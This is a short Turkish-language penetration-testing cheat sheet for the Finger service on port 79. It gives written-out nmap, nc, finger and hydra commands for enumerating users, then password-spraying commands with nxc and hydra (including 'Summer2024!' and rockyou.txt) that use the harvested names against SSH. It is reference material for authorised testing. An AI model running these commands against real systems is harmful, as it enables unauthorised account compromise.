Pentesting Finger
network enum
Finger (79/tcp) kullanıcı ve oturum bilgisi sızdırır. Brute ve kullanıcı listesi üretmek için hâlâ işe yarar; çıktı SSH/mail spray’e beslenir.
Metodoloji
Section titled “Metodoloji”-
79/tcp açık mı ve banner ne veriyor bak.
-
Boş /
*/ bilinen kullanıcı sorguları at. -
Wordlist ile kullanıcı enum yap.
-
Bulunan kullanıcıları SSH/SMTP/FTP spray’e taşı.
nmap -Pn -sV -p79 TARGETnc -nv TARGET 79root*userfinger @TARGETfinger root@TARGETfinger user@TARGETfor u in $(cat users.txt); do echo "$u"; finger "$u@TARGET"; donenmap -p79 --script finger TARGETOtomasyon
Section titled “Otomasyon”hydra -L users.txt -s 79 finger://TARGET# basit:while read u; do printf '%s\n' "$u" | nc -nv TARGET 79; done < users.txtÇıktıdan fayda
Section titled “Çıktıdan fayda”- home directory- login shell- idle / plan dosyası- gerçek isim → parola guess# spraynxc ssh TARGET -u users_from_finger.txt -p 'Summer2024!'hydra -L users_from_finger.txt -P rockyou.txt ssh://TARGET -t 4Checklist
Section titled “Checklist”[ ] 79/tcp fingerprint[ ] root/*/user sorguları[ ] Wordlist enum ile kullanıcı listesi[ ] Spray için listeye aktarıldı